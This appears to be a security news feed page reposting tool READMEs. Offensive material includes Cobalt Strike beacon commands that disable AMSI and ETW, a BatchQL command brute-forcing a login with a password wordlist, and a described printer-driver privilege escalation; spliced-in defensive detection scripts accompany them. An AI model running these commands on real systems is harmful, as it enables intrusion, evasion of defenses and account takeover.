RSS Security


InlineExecute-Assembly - A PoC Beacon Object File (BOF) That Allows Security Professionals To Perform In Process .NET Assembly Execution

19 September 2021 at 20:30
By: Zion3R


InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in-process .NET assembly execution as an alternative to Cobalt Strike's traditional fork-and-run execute-assembly module. InlineExecute-Assembly will execute any assembly with the entry point of Main(string[] args) or Main(). This should allow you to run most released tooling without any prior modification needed.

The BOF will automatically determine which Common Language Runtime (CLR) needs to be loaded into the process for your assembly (v2.0.50727 or v4.0.30319) prior to execution and, in most cases, should exit gracefully if any issues arise. The BOF also supports several flags which allow the operator to dictate several behaviors prior to .NET execution: disabling AMSI via in-memory patching, disabling and restoring ETW via in-memory patching, customizing the name of the CLR AppDomain to be created, choosing whether to direct the console output of your assembly to a named pipe or a mailslot, and switching the default entry point from Main(string[] args) to Main(). More details on usage, use cases, and possible detections can be found below and at https://securityintelligence.com/posts/net-execution-inlineexecute-assembly/.

Lastly, the advantage of executing our .NET assemblies in the same process as our beacon implant is that we avoid the default behavior of Cobalt Strike's execute-assembly module, which creates a new process to then load/inject the CLR/.NET assembly. However, other opsec considerations still exist, for example: does the process we are executing within normally load the CLR, and does the .NET assembly we are executing have any known signatures? The corresponding disadvantage is that if something does get detected and killed, for example by AMSI, your beacon is also killed.


Subject References

This tool wouldn't exist without being able to piggyback off some really great research, tools, and code already published by members of the security community. So thank you. Lastly, if you feel anyone has been left out below, please let me know and I will be sure to get them added.

  • HostingCLR - here - CLR/executing assembly logic
  • Dotnet-Loader-Shellcode - (by @modexpblog) - here - All around great research, including on COM Interfaces for executing .NET in C -> Real MVP
  • Donut - (by @TheRealWover and @modexpblog) - here - COM Interfaces header
  • Memory Patching AMSI Bypass - (by @_RastaMouse) - here - AMSI memory patching research
  • Metasploit-Execute-Assembly - (by @b4rtik) - here - Modified AMSI patching and used the find .NET version function
  • ExecuteAssembly - (by @med0x2e) - here - Modified aggressor script
  • Hiding Your .NET ETW - (by @xpn) - here - Great ETW research
  • ETW BOF - (by @ajpc500) - here - Modified ETW patching
  • ExecuteAssembly_Mailslot - (by @N4k3dTurtl3) - here - Modified using mailslots for console redirection
  • @freefirex2 - Was kind enough to share some good BOF inner workings and gotchas.

Getting Started
  1. Copy the inlineExecute-Assembly folder with all of its contents to a system you plan to connect with via the Cobalt Strike GUI application.
  2. Load in the inlineExecute-Assembly.cna Aggressor script
  3. Run inlineExecute-Assembly --dotnetassembly /path/to/assembly.exe for most basic execution (see use cases below for specific flag examples)

Build Your Own

Run the below command inside the src directory via x64 Native Tools Command Prompt for VS 2019

cl.exe /c inlineExecute-Assembly.c /GS- /FoinlineExecute-Assemblyx64.o

Run the below command inside the src directory via x86 Native Tools Command Prompt for VS 2019

cl.exe /c inlineExecute-Assembly.c /GS- /FoinlineExecute-Assemblyx86.o

Flags
--dotnetassembly        Directory path to your assembly **required**
--assemblyargs Assembly arguments to pass
--appdomain Change default name of AppDomain sent (default value is totesLegit and is set via the included aggressor script) *Domain always unloaded*
--amsi Attempts to disable AMSI via in memory patching (If successful AMSI will be disabled for the entire life of process)
--etw Attempts to disable ETW via in memory patching (If successful ETW will be disabled for the entire life of process unless reverted)
--revertetw Attempts to disable ETW via in memory patching and then repatches it back to original state
--pipe Change default name of named pipe (default value is totesLegit and is set via the included aggressor script)
--mailslot Switches to using mailslots to redirect console output. Changes default name of mailslot (If left blank, default value is totesLegit and is set via the included aggressor script)
--main Changes entry point to Main() (default value is Main(string[] args))


Use Case

Execute .NET assembly


Syntax
beacon> inlineExecute-Assembly --dotnetassembly /root/Desktop/Seatbelt.exe

Use Case

Execute .NET assembly with arguments


Syntax
beacon> inlineExecute-Assembly --dotnetassembly /root/Desktop/Seatbelt.exe --assemblyargs AntiVirus AppLocker

Use Case

Execute .NET assembly with arguments and disable AMSI


Syntax
beacon> inlineExecute-Assembly --dotnetassembly /root/Desktop/Seatbelt.exe --assemblyargs AntiVirus AppLocker --amsi

Use Case

Execute .NET assembly with arguments and disable ETW


Syntax
beacon> inlineExecute-Assembly --dotnetassembly /root/Desktop/Seatbelt.exe --assemblyargs AntiVirus AppLocker --etw

Use Case

Execute .NET assembly with arguments and redirect output via mailslots instead of the default named pipe


Syntax
beacon> inlineExecute-Assembly --dotnetassembly /root/Desktop/Seatbelt.exe --mailslot

Use Case

Execute .NET assembly with arguments and change the default named pipe name set in the aggressor script


Syntax
beacon> inlineExecute-Assembly --dotnetassembly /root/Desktop/Seatbelt.exe --pipe forRealLegit

Use Case

Execute .NET assembly and change the default app domain set in the aggressor script


Syntax
beacon> inlineExecute-Assembly --dotnetassembly /root/Desktop/Seatbelt.exe --appdomain forRealLegit

Use Case

Execute .NET assembly with Main() entry point instead of the default Main(string[] args)


Syntax
beacon> inlineExecute-Assembly --dotnetassembly /root/Desktop/simpleMain.exe --main

Use Case

Go HAM


Syntax
beacon> inlineExecute-Assembly --dotnetassembly /root/Desktop/Seatbelt.exe --assemblyargs AntiVirus AppLocker --amsi --etw --appdomain forRealLegit --mailslot forRealLegit

Caveats
  1. While I have tried to make this as stable as possible, there are no guarantees things will never crash and beacons won’t die. We don’t have the added luxury of fork and run, where if something goes wrong our beacon lives. This is the tradeoff with BOFs. With that said, I can’t stress enough how important it is that you test your assemblies beforehand to make sure they will work properly with the tool.
  2. Since the BOF is executed in process and takes over the beacon while running, this should be taken into account before it is used for long-running assemblies. If you choose to run something that will take a long time to return results, your beacon will not be available to run more commands until the assembly finishes and the results come back. This also doesn’t adhere to the configured sleep: for example, if your sleep is set to 10 minutes and you run the BOF, you will get results back as soon as the BOF finishes executing.
  3. Unless modification is done to tools that load PEs in memory (e.g., SafetyKatz), these will most likely kill your beacon. Many of these tools work fine with execute-assembly because they are able to send their console output from the sacrificial process before exiting. When they exit via our in-process BOF, they kill our process, which kills our beacon. These can be modified to work, but I would advise running these types of assemblies via execute-assembly, since other non-OPSEC-friendly things could be loaded into your process that don’t get removed.
  4. If your assembly uses Environment.Exit, this will need to be removed, as it will kill the process and the beacon.
  5. Named pipes and mailslots need to be unique. If you don’t receive data back and your beacon is still alive, the issue is most likely that you need to select a different named pipe or mailslot name.

Detection

Some detection and mitigation strategies that could be used:

  1. Uses PAGE_EXECUTE_READWRITE when performing AMSI and ETW memory patching. This was done on purpose and should be a red flag as very few programs have memory ranges with the memory protection of PAGE_EXECUTE_READWRITE.
  2. Default name of named pipe created is totesLegit. This was done on purpose and signature detections could be used to flag this.
  3. Default name of mailslot created is totesLegit. This was done on purpose and signature detections could be used to flag this.
  4. Default name of AppDomain loaded is totesLegit. This was done on purpose and signature detections could be used to flag this.
  5. Good tips on detecting malicious use of .NET (by @bohops) here, (by F-Secure) here, and here
  6. Looking for .NET CLR loading into suspicious processes, such as unmanaged processes which should never have the CLR loaded.
  7. Event Tracing here
  8. Looking for other known Cobalt Strike Beacon IOC's or C2 egress/communication IOC's.
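Detection logic for the indicators listed above, as an added example that is not part of the tool or the original post: it runs the README's ideas (default totesLegit pipe/mailslot/AppDomain names, CLR loads into unmanaged processes, PAGE_EXECUTE_READWRITE applied to amsi.dll or ntdll.dll) over constructed telemetry. The event dictionary shape, its field names and the baseline of expected managed-code hosts are assumptions to map onto your own Sysmon, .NET runtime ETW and EDR memory-protection data.

```python
"""Detection sketch for the indicators listed above (added example, not the tool's code).

Event dictionaries stand in for telemetry: Sysmon-style pipe and image-load events,
.NET runtime ETW AppDomain loads, and EDR-style memory-protection events. Field names
and the baseline of expected managed-code hosts are assumptions to map onto your own data.
"""
from __future__ import annotations

import ntpath
from dataclasses import dataclass

# Default artifact name the BOF uses for its pipe, mailslot and AppDomain (from the README).
DEFAULT_ARTIFACT_NAME = "totesLegit"

# Modules whose load means the CLR is now hosted in the process.
CLR_MODULES = {"clr.dll", "mscorwks.dll", "mscoree.dll", "clrjit.dll"}

# Assumed baseline of processes expected to host the CLR; tune per environment.
MANAGED_HOST_BASELINE = {"powershell.exe", "pwsh.exe", "devenv.exe", "msbuild.exe", "w3wp.exe"}

# Windows memory protection constant requested by the BOF for its AMSI/ETW patches.
PAGE_EXECUTE_READWRITE = 0x40

# Modules the README says are patched in memory (AMSI scanning, ETW event writing).
PATCH_TARGET_MODULES = {"amsi.dll", "ntdll.dll"}


@dataclass(frozen=True)
class Finding:
    rule: str
    process: str
    detail: str


def _basename(path: str) -> str:
    return ntpath.basename(path).lower()


def check_event(ev: dict) -> list[Finding]:
    """Apply the README's detection ideas to a single event."""
    findings: list[Finding] = []
    kind = ev.get("event")
    proc = _basename(ev.get("image", ""))

    # 1. Default named pipe / mailslot / AppDomain name left unchanged by the operator.
    if kind in ("PipeCreated", "MailslotCreated", "AppDomainLoad"):
        name = ev.get("name", "")
        if _basename(name) == DEFAULT_ARTIFACT_NAME.lower():
            findings.append(Finding("default-artifact-name", proc, f"{kind} {name}"))

    # 2. CLR loaded into a process that is not an expected managed-code host.
    if kind == "ImageLoaded":
        loaded = _basename(ev.get("loaded", ""))
        if loaded in CLR_MODULES and proc not in MANAGED_HOST_BASELINE:
            findings.append(Finding("clr-in-unmanaged-process", proc, f"loaded {loaded}"))

    # 3. RWX protection applied to amsi.dll / ntdll.dll code (in-memory patching).
    if kind == "MemoryProtect":
        target = _basename(ev.get("target_module", ""))
        if ev.get("protection") == PAGE_EXECUTE_READWRITE and target in PATCH_TARGET_MODULES:
            findings.append(Finding("rwx-patch-of-security-module", proc,
                                    f"PAGE_EXECUTE_READWRITE on {target}"))
    return findings


def scan(events: list[dict]) -> list[Finding]:
    return [f for ev in events for f in check_event(ev)]


# Constructed sample telemetry (not captured from a real host); notepad.exe stands in
# for an unmanaged process that would not normally load the CLR.
SAMPLE_EVENTS = [
    {"event": "ImageLoaded", "image": r"C:\Windows\System32\notepad.exe",
     "loaded": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll"},
    {"event": "MemoryProtect", "image": r"C:\Windows\System32\notepad.exe",
     "target_module": r"C:\Windows\System32\amsi.dll", "protection": 0x40},
    {"event": "MemoryProtect", "image": r"C:\Windows\System32\notepad.exe",
     "target_module": r"C:\Windows\System32\ntdll.dll", "protection": 0x40},
    {"event": "AppDomainLoad", "image": r"C:\Windows\System32\notepad.exe", "name": "totesLegit"},
    {"event": "PipeCreated", "image": r"C:\Windows\System32\notepad.exe", "name": r"\totesLegit"},
    # Benign controls: PowerShell hosting the CLR, and a read-write protection change.
    {"event": "ImageLoaded", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "loaded": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll"},
    {"event": "MemoryProtect", "image": r"C:\Program Files\App\app.exe",
     "target_module": r"C:\Program Files\App\app.exe", "protection": 0x04},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f.rule}] {f.process}: {f.detail}")
```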


QLOG - Windows Security Logging

19 September 2021 at 11:30
By: Zion3R


QLOG provides enriched event logging for security-related events on Windows-based systems. It is under heavy development and currently in alpha state. QLOG doesn't use API hooks and doesn't require a driver to be installed on the target system; it only uses ETW to retrieve its telemetry. Currently QLOG supports "process create" events only, but other enriched events will follow soon. QLOG runs as a Windows service, but can also run in console mode if you want to stream the enriched events directly to the console.


How does it work

QLOG reads from ETW, enriches events and writes the enriched events to the Event Channel "QLOG". It creates and uses a new event source named "QMonitor" to write to the Windows Eventlog.

Here is the sequence of event processing:

  • Create ETW session & Subscribe to relevant kernel and userland ETW providers
  • Read Events from ETW providers
  • Enrich Events
  • Write enriched events to eventlog channel QLOG

Development & License

QLOG is being developed by threathunters.io community and will be open sourced once it reaches production grade maturity.


Why we created QLOG?

Sysmon does a great job, but we wanted to create a tool which is open source and doesn't require drivers to be installed on target systems. Also, Sysmon is NOT SUPPORTED by Microsoft at all, so if you run into problems in prod, you're on your own. Sure, QLOG doesn't have support either, but it will be open sourced so we can fix issues with the power of the security community and develop new features based on the community's requirements.


Usage & install

QLOG requires .NET Framework >=4.7.2 to be installed.

To run in interactive console mode, just run

qlog.exe

To install / deinstall as Windows service, run:

#install service
qlog.exe -i

#deinstall service
qlog.exe -u

Do you want to contribute?

Please see https://threathunters.io/ on how to join threathunters.io community.


Example output of enriched PROCESS CREATE events
{
"EventGuid": "68795fe8-67e7-410b-a5c0-8364746d7ffe",
"StartTime": "2021-07-11T11:06:56.9621746+02:00",
"QEventID": 100,
"QType": "Process Create",
"Username": "TESTOS\\TESTUSER",
"Imagefilename": "TEAMS.EXE",
"KernelImagefilename": "TEAMS.EXE",
"OriginalFilename": "TEAMS.EXE",
"Fullpath": "C:\\Users\\TESTUSER\\AppData\\Local\\Microsoft\\Teams\\current\\Teams.exe",
"PID": 21740,
"Commandline": "\"C:\\Users\\TESTUSER\\AppData\\Local\\Microsoft\\Teams\\current\\Teams.exe\" --type=renderer --autoplay-policy=no-user-gesture-required --disable-background-timer-throttling --field-trial-handle=1668,499009601563875864,12511830007210419647,131072 --enable-features=WebComponentsV0Enabled --disable-features=CookiesWithoutSameSiteMustBeSecure,SameSiteByDefaultCookies,SpareRendererForSitePerProcess --lang=de --enable-wer --ms-teams-less-cors=522133263 --app-user-model-id=com.squirrel.Teams.Teams --app-path=\"C:\\Users \\jocke",
"Modulecount": 41,
"TTPHash": "42AC63285408F5FD91668B16F8E9157FD97046AB63E84117A14E31A188DDC62F",
"Imphash": "F14F00FA1D4C82B933279C1A28957252",
"sha256": "155625190ECAA90E596CB258A07382184DB738F6EDB626FEE4B9652FA4EC1CC2",
"md5": "9453BC2A9CC489505320312F4E6EC21E",
"sha1": "7219CB54AC535BA55BC1B202335A6291FDC2D76E",
"ProcessIntegrityLevel": "None",
"isOndisk": true,
"isRunning": true,
"Signed": "Signature valid",
"AuthenticodeHash": "B8AD58EE5C35B3F80C026A318EEA34BABF6609C077CB3D45AEE69BF5C9CF8E11",
"Signatures": [
{
"Subject": "CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US",
"Issuer": "CN=Microsoft Code Signing PCA 2010, O=Microsoft Corporation, L=Redmond, S=Washington, C=US",
"NotBefore": "15.12.2020 22:24:20",
"NotAfter": "02.12.2021 22:24:20",
"DigestAlgorithmName": "SHA256",
"Thumbprint": "E8C15B4C98AD91E051EE5AF5F524A8729050B2A2",
"TimestampSignatures": [
{
"Subject": "CN=Microsoft Time-Stamp Service, OU=Thales TSS ESN:3BBD-E338-E9A1, OU=Microsoft America Operations, O=Microsoft Corporation, L=Redmond, S=Washington, C=US",
"Issuer": "CN=Microsoft Time-Stamp PCA 2010, O=Microsoft Corporation, L=Redmond, S=Washington, C=US",
"NotBefore": "12.11.2020 19:26:02",
"NotAfter": "11.02.2022 19:26:02",
"DigestAlgorithmName": "SHA256",
"Thumbprint": "E8220CE2AAD2073A9C8CD78752775E29782AABE8",
"Timestamp": "15.06.2021 00:39:50 +02:00"
}
]
},
{
"Subject": "CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US",
"Issuer": "CN=Microsoft Code Signing PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US",
"NotBefore": "15.12.2020 22:31:47",
"NotAfter": "02.12.2021 22:31:47",
"DigestAlgorithmName": "SHA256",
"Thumbprint": "C774204049D25D30AF9AC2F116B3C1FB88EE00A4",
"TimestampSignatures": [
{
"Subject": "CN=Microsoft Time-Stamp Service, OU=Thales TSS ESN:F87A-E374-D7B9, OU=Microsoft Operations Puerto Rico, O=Microsoft Corporation, L=Redmond, S=Washington, C=US",
"Issuer": "CN=Microsoft Time-Stamp PCA 2010, O=Microsoft Corporation, L=Redmond, S=Washington, C=US",
"NotBefore": "14.01.2021 20:02:23",
"NotAfter": "11.04.2022 21:02:23",
"DigestAlgorithmName": "SHA256",
"Thumbprint": "ED2C601EDD49DD2A934D2AB32DCACC19940161EF",
"Timestamp": "15.06.2021 00:39:53 +02:00"
}
]
}
],
"ParentProcess": {
"EventGuid": null,
"StartTime": "2021-07-11T09:54:28.9558001+02:00",
"QEventID": 100,
"QType": "Process Create",
"Username": "TESTOS\\TESTUSER",
"Imagefilename": "",
"KernelImagefilename": "",
"OriginalFilename": "TEAMS.EXE",
"Fullpath": "C:\\Users\\TESTUSER\\AppData\\Local\\Microsoft\\Teams\\current\\Teams.exe",
"PID": 16232,
"Commandline": "C:\\Users\\TESTUSER\\AppData\\Local\\Microsoft\\Teams\\current\\Teams.exe ",
"Modulecount": 162,
"TTPHash": "",
"Imphash": "F14F00FA1D4C82B933279C1A28957252",
"sha256": "155625190ECAA90E596CB258A07382184DB738F6EDB626FEE4B9652FA4EC1CC2",
"md5": "9453BC2A9CC489505320312F4E6EC21E",
"sha1": "7219CB54AC535BA55BC1B202335A6291FDC2D76E",
"ProcessIntegrityLevel": "Medium",
"isOndisk": true,
"isRunning": true,
"Signed": "Signature valid",
"AuthenticodeHash": "B8AD58EE5C35B3F80C026A318EEA34BABF6609C077CB3D45AEE69BF5C9CF8E11",
"Signatures": [
{
"Subject": "CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US",
"Issuer": "CN=Microsoft Code Signing PCA 2010, O=Microsoft Corporation, L=Redmond, S=Washington, C=US",
"NotBefore": "15.12.2020 22:24:20",
"NotAfter": "02.12.2021 22:24:20",
"DigestAlgorithmName": "SHA256",
"Thumbprint": "E8C15B4C98AD91E051EE5AF5F524A8729050B2A2",
"TimestampSignatures": [
{
"Subject": "CN=Microsoft Time-Stamp Service, OU=Thales TSS ESN:3BBD-E338-E9A1, OU=Microsoft America Operations, O=Microsoft Corporation, L=Redmond, S=Washington, C=US",
"Issuer": "CN=Microsoft Time-Stamp PCA 2010, O=Microsoft Corporation, L=Redmond, S=Washington, C=US",
"NotBefore": "12.11.2020 19:26:02",
"NotAfter": "11.02.2022 19:26:02",
"DigestAlgorithmName": "SHA256",
"Thumbprint": "E8220CE2AAD2073A9C8CD78752775E29782AABE8",
"Timestamp": "15.06.2021 00:39:50 +02:00"
}
]
},
{
"Subject": "CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US",
"Issuer": "CN=Microsoft Code Signing PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US",
"NotBefore": "15.12.2020 22:31:47",
"NotAfter": "02.12.2021 22:31:47",
"DigestAlgorithmName": "SHA256",
"Thumbprint": "C774204049D25D30AF9AC2F116B3C1FB88EE00A4",
"TimestampSignatures": [
{
"Subject": "CN=Microsoft Time-Stamp Service, OU=Thales TSS ESN:F87A-E374-D7B9, OU=Microsoft Operations Puerto Rico, O=Microsoft Corporation, L=Redmond, S=Washington, C=US",
"Issuer": "CN=Microsoft Time-Stamp PCA 2010, O=Microsoft Corporation, L=Redmond, S=Washington, C=US",
"NotBefore": "14.01.2021 20:02:23",
"NotAfter": "11.04.2022 21:02:23",
"DigestAlgorithmName": "SHA256",
"Thumbprint": "ED2C601EDD49DD2A934D2AB32DCACC19940161EF",
"Timestamp": "15.06.2021 00:39:53 +02:00"
}
]
}
],
"ParentProcess": null
}
}
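A triage helper for the enriched event format shown above, as an added example that is not part of QLOG: it walks the nested ParentProcess chain, checks that each signer certificate was inside its validity window at countersignature time (using the dd.MM.yyyy date format QLOG prints), and flags a binary whose on-disk name differs from its PE OriginalFilename. The embedded event is a trimmed copy of the example above, and the function names are this example's own.

```python
"""Triage helpers for QLOG enriched "Process Create" events (added example, not QLOG code).

Field names follow the example output above; SAMPLE_EVENT is a trimmed copy of that
example with the fields these checks do not need removed.
"""
from __future__ import annotations

import ntpath
from datetime import datetime

# QLOG prints certificate validity as dd.MM.yyyy HH:mm:ss (no offset) and the
# countersignature time with a trailing UTC offset, as in the example output.
CERT_DATE_FMT = "%d.%m.%Y %H:%M:%S"
TIMESTAMP_FMT = "%d.%m.%Y %H:%M:%S %z"


def signature_issues(event: dict) -> list[str]:
    """Return reasons the signature on this process image deserves a look."""
    issues: list[str] = []
    if event.get("Signed") != "Signature valid":
        issues.append(f"signature state is {event.get('Signed')!r}")
    for sig in event.get("Signatures", []):
        not_before = datetime.strptime(sig["NotBefore"], CERT_DATE_FMT)
        not_after = datetime.strptime(sig["NotAfter"], CERT_DATE_FMT)
        for ts in sig.get("TimestampSignatures", []):
            # Cert dates carry no offset, so compare in the same wall clock the
            # Timestamp is printed in by dropping its tzinfo.
            signed_at = datetime.strptime(ts["Timestamp"], TIMESTAMP_FMT).replace(tzinfo=None)
            if not (not_before <= signed_at <= not_after):
                issues.append(f"{sig['Thumbprint']} was not valid at countersign time {ts['Timestamp']}")
    return issues


def is_renamed_binary(event: dict) -> bool:
    """True when the file name on disk differs from the PE version resource's OriginalFilename."""
    on_disk = ntpath.basename(event.get("Fullpath", "")).lower()
    original = event.get("OriginalFilename", "").lower()
    return bool(on_disk and original) and on_disk != original


def parent_chain(event: dict) -> list[str]:
    """Child first, then each nested ParentProcess, as 'IMAGE(PID)'."""
    chain: list[str] = []
    node = event
    while node is not None:
        # The parent record in the example has an empty Imagefilename; fall back to OriginalFilename.
        image = node.get("Imagefilename") or node.get("OriginalFilename") or "?"
        chain.append(f"{image}({node.get('PID')})")
        node = node.get("ParentProcess")
    return chain


def triage(event: dict) -> dict:
    return {
        "chain": parent_chain(event),
        "integrity": event.get("ProcessIntegrityLevel"),
        "renamed_binary": is_renamed_binary(event),
        "signature_issues": signature_issues(event),
    }


# Trimmed copy of the example event above (only the fields used here).
SAMPLE_EVENT = {
    "QEventID": 100,
    "QType": "Process Create",
    "Username": "TESTOS\\TESTUSER",
    "Imagefilename": "TEAMS.EXE",
    "OriginalFilename": "TEAMS.EXE",
    "Fullpath": "C:\\Users\\TESTUSER\\AppData\\Local\\Microsoft\\Teams\\current\\Teams.exe",
    "PID": 21740,
    "ProcessIntegrityLevel": "None",
    "Signed": "Signature valid",
    "Signatures": [
        {
            "Subject": "CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US",
            "NotBefore": "15.12.2020 22:24:20",
            "NotAfter": "02.12.2021 22:24:20",
            "Thumbprint": "E8C15B4C98AD91E051EE5AF5F524A8729050B2A2",
            "TimestampSignatures": [{"Timestamp": "15.06.2021 00:39:50 +02:00"}],
        }
    ],
    "ParentProcess": {
        "Imagefilename": "",
        "OriginalFilename": "TEAMS.EXE",
        "PID": 16232,
        "ParentProcess": None,
    },
}

if __name__ == "__main__":
    print(triage(SAMPLE_EVENT))
```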



BatchQL - GraphQL Security Auditing Script With A Focus On Performing Batch GraphQL Queries And Mutations

18 September 2021 at 20:30
By: Zion3R


BatchQL is a GraphQL security auditing script with a focus on performing batch GraphQL queries and mutations. This script is not complex, and we welcome improvements.

When exploring the problem space of GraphQL batching attacks, we found that there were a few blog posts on the internet, however no tool to perform GraphQL batching attacks.

GraphQL batching attacks can be quite serious depending on the functionalities implemented. For example, imagine a password reset functionality which expects a 4 digit pin that was sent to your email. With this tool, you could attempt all 10k pin attempts in a single GraphQL query. This may bypass any rate limiting or account lockouts depending on the implementation details of the password reset flow.


Detections

This tool is capable of detecting the following:

  • Introspection query support
  • Schema suggestions detection
  • Potential CSRF detection
  • Query name based batching
  • Query JSON list based batching

Attacks

Currently, this tool only supports sending JSON list based queries for batching attacks. It supports scenarios where the variables are embedded in the query, or where they are provided in the JSON input.


Usage

Enumeration
❯ python batch.py -e http://re.local:5000/graphiql -p localhost:8080

Schema suggestions enabled. Use Clairvoyance to recover schema: https://github.com/nikitastupin/clairvoyance
CSRF GET based successful. Please confirm that this is a valid issue.
CSRF POST based successful. Please confirm that this is a valid issue.
Query name based batching: GraphQL batching is possible... preflight request was successful.
Query JSON list based batching: GraphQL batching is possible... preflight request was successful.
Most provide query, wordlist, and size to perform batching attack.

Batching Attacks
  1. Save a file that contains your GraphQL query i.e. acc-login.txt:
mutation emailLoginRemembered($loginInput: InputRememberedEmailLogin!) {
  emailLoginRemembered(loginInput: $loginInput) {
    authToken {
      accessToken
      __typename
    }
    userSessionResponse {
      userToken
      userIdentity {
        userId
        identityType
        verified
        onboardingStatus
        registrationReferralCode
        userReferralInfo {
          referralCode {
            code
            valid
            __typename
          }
          __typename
        }
        __typename
      }
      __typename
    }
    __typename
  }
}
  2. Run the following command to run a GraphQL batching attack:
❯ python batch.py --query acc-login.txt --wordlist passwords.txt -v '{"loginInput":{"email":"[email protected]","password":"#VARIABLE#","rememberMe":false}}' --size 100 -e http://re.local:5000/graphiql -p localhost:8080

The above command does the following:

  • Specifies a query from a local file --query acc-login.txt.
  • Specifies a wordlist --wordlist passwords.txt
  • Specifies the variable input with the replacement identifier -v {"loginInput":{"email":"[email protected]","password":"#VARIABLE#","rememberMe":false}}
  • Specifies the batch size --size 100
  • Specifies the endpoint -e http://re.local:5000/graphiql
  • Specifies a proxy -p localhost:8080
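A server-side guard against the two batching shapes this tool probes for (a JSON list of operations in one body, and many aliased top-level fields in one document), as an added example that is not part of BatchQL: it counts operations in the request body and root selections in each query with a small tokenizer, and rejects requests over configurable limits. The request bodies are constructed; the limits and function names are this example's assumptions, to be adapted to the server in front of which it runs.

```python
"""Request-level guard for GraphQL batching (added example, not BatchQL code).

Limits the two batching shapes BatchQL probes for: a JSON list of operations in
one HTTP body, and many aliased top-level fields inside one document. Limits and
names are assumptions; place inspect_request() in front of the GraphQL handler.
"""
from __future__ import annotations

import json
import re

# Token classes: block strings, strings, comments, spread, names, numbers, punctuation.
_TOKEN_RE = re.compile(
    r'"""[\s\S]*?"""|"(?:\\.|[^"\\])*"|#[^\r\n]*|\.\.\.|[A-Za-z_]\w*|-?\d[\d.eE+-]*|\S'
)
_NAME_RE = re.compile(r"[A-Za-z_]\w*")
_DEFINITION_KEYWORDS = {"query", "mutation", "subscription", "fragment"}


def count_top_level_fields(document: str) -> int:
    """Count selections directly under each operation's root (an alias counts once).

    Fields inside fragment definitions and nested selection sets are not counted;
    an inline fragment or fragment spread at the root counts as one selection.
    """
    depth = 0            # selection-set nesting ({ })
    parens = 0           # argument / variable-definition nesting (( ))
    counting = False     # inside an operation root, not a fragment definition
    last_keyword = None  # definition keyword seen at depth 0
    prev = None
    skip_next_name = False
    count = 0
    for tok in _TOKEN_RE.findall(document):
        if tok.startswith("#"):
            continue                       # comment
        if tok == "(":
            parens += 1
        elif tok == ")":
            parens -= 1
        elif parens == 0 and tok == "{":   # braces inside arguments are object literals
            if depth == 0:
                counting = last_keyword != "fragment"
                last_keyword = None
            depth += 1
        elif parens == 0 and tok == "}":
            depth -= 1
        elif _NAME_RE.fullmatch(tok):
            if depth == 0 and parens == 0 and tok in _DEFINITION_KEYWORDS:
                last_keyword = tok
            elif depth == 1 and parens == 0 and counting:
                if skip_next_name:
                    skip_next_name = False          # type condition after "... on"
                elif prev in (":", "@"):
                    pass                            # field behind an alias, or a directive name
                elif prev == "..." and tok == "on":
                    count += 1                      # inline fragment: one selection
                    skip_next_name = True
                else:
                    count += 1
        prev = tok
    return count


def inspect_request(body: str, max_batch: int = 1, max_top_level_fields: int = 5) -> tuple[bool, str]:
    """Decide whether a raw GraphQL HTTP body stays within the batching limits."""
    try:
        payload = json.loads(body)
    except json.JSONDecodeError:
        return False, "body is not JSON"
    operations = payload if isinstance(payload, list) else [payload]
    if len(operations) > max_batch:
        return False, f"json-list batch of {len(operations)} operations exceeds limit {max_batch}"
    total = 0
    for op in operations:
        if not isinstance(op, dict) or not isinstance(op.get("query"), str):
            return False, "operation without a query string"
        total += count_top_level_fields(op["query"])
    if total > max_top_level_fields:
        return False, f"{total} top-level fields exceeds limit {max_top_level_fields}"
    return True, "ok"


# Constructed request bodies in the shapes the tool sends (not captured traffic).
SINGLE = json.dumps({"query": "query { me { id ...Profile } } fragment Profile on User { name email }"})
ALIAS_BATCH = json.dumps({"query": "mutation { " + " ".join(
    f'a{i}: emailLoginRemembered(loginInput: {{email: "u@example.com", password: "pw{i}"}}) '
    "{ authToken { accessToken } }" for i in range(10)) + " }"})
LIST_BATCH = json.dumps([
    {"query": "mutation Login($p: String!) { login(password: $p) { token } }", "variables": {"p": f"pw{i}"}}
    for i in range(100)
])

if __name__ == "__main__":
    for name, body in (("single", SINGLE), ("alias batch", ALIAS_BATCH), ("list batch", LIST_BATCH)):
        print(name, inspect_request(body))
```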

References


Concealed Position - Bring Your Own Print Driver Privilege Escalation Tool

18 September 2021 at 11:30
By: Zion3R


Concealed Position is a local privilege escalation attack against Windows using the concept of "Bring Your Own Vulnerability". Specifically, Concealed Position (CP) uses the as-designed Package Point and Print logic in Windows that allows a low privilege user to stage and install printer drivers. CP specifically installs drivers with known vulnerabilities, which are then exploited to escalate to SYSTEM. Concealed Position was first presented at DEF CON 29.


What exploits are available

Concealed Position offers four exploits - all with equally dumb names:

The exploits are neat because, besides SLASHINGDAMAGE, they will continue working even after the issues are patched. The only mechanism Windows has to stop users from using old drivers is to revoke the driver's certificate - something that is not(?) historically done.


But which exploit should I use?!

Probably ACIDDAMAGE. RADIANTDAMAGE and POISONDAMAGE are race conditions (to overwrite a DLL) and SLASHINGDAMAGE, hopefully, is patched most everywhere.


How does it work?

Concealed Position has two parts. An evil printer and a client. The client reaches out to the server, grabs a driver, gets the driver stored in the driver store, installs the printer, and exploits the install process. Easy! In MSAPI speak, the attack goes something like this:

Stage 1: Stage the driver in the driver store
client to server: GetPrinterDriver
server to client: Response with driver

Stage 2: Install the driver from the driver store
client: InstallPrinterDriverFromPackage

Stage 3: Add a local printer (exploitation stage)
client: Add printer

It is important to note that SLASHINGDAMAGE doesn't actually work like that though. SLASHINGDAMAGE is an implementation of the evil printer attack described at DEFCON 28 (2020) and has long since been patched. I just so happen to enjoy the attack (it sparked the rest of this development) and figured I'd leave the exploit in my evil server... as confusing as that may be.


Is this a Windows vulnerability?

